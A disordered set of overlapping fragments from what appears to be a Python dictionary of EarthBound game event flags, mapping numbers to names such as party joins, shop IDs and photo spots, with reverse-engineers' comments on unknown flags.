'GOT_PHOTO_DEEP_DARKNESS', 728:", "300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305", "34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40:", "flags) # 228 (I hate multipurpose flags) # 229 (I hate multipurpose flags)", "'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE',", "'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY',", "'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP',", "(Unknown. Something about the City Bus?) # 314 (Unknown. Something about the Runaway", "343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is only", "'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS',", "'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE',", "'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576:", "is only set if you're near (0x02A0, 0x0D70) in a radius of 16", "682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688:", "'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic", "'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2',", "741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', #", "'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?)", "36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42:", "# 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS',", "681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687:", "'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM',", "625 (Something about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked out", "778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't", "# 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for", "526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS',", "'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP',", "'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) #", "240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246:", "'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP',", "# 286 (???) # 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE',", "'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN',", "253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259:", "text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109:", "232 (I hate multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN',", "'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli Building)", "multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I hate multipurpose", "75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81:", "'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED',", "'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED',", "582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', #", "'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS',", "'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH',", "'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', #", "= { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6:", "'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113:", "'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT',", "STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61:", "'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', #", "'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE',", "27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33:", "'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY',", "570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP',", "(I hate multipurpose flags) # 230 (I hate multipurpose flags) # 231 (I", "347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353:", "flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES',", "223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) #", "'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO',", "'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway", "Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED',", "49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague", "315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318:", "radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350:", "Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something", "Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753:", "218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224:", "second Hieroglyph Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED',", "Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',", "'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP',", "465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?)", "'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN',", "453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459:", "hate multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I hate", "265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271:", "'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', #", "704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710:", "in the Monotoli Building) -- Got kicked out of Pokey's Room in the", "set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY',", "616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base)", "686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692:", "381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', #", "multipurpose flags) # 230 (I hate multipurpose flags) # 231 (I hate multipurpose", "# 680 (Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP',", "306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312:", "'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the", "'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA',", "1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7:", "393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399:", "769 (Checked when you talk to Tracy after defeating Giygas, but never set)", "'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143:", "243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249:", "737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743:", "'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65", "no NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',", "466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED',", "764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked", "332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338:", "Unused, there's no NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED',", "'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466:", "First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third", "53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) # 55 (Also", "714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720:", "574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580:", "'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT',", "40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46:", "a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT',", "(Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey)", "calls you about the Gourmet Yogurt Machine) # 377 (???) # 378 (???)", "'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200:", "'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER',", "221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I", "'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL',", "299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME',", "Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about", "# 54 (Montague at beginning of expanded mine?) # 55 (Also related to", "333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339:", "467 (Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470:", "the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS',", "'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 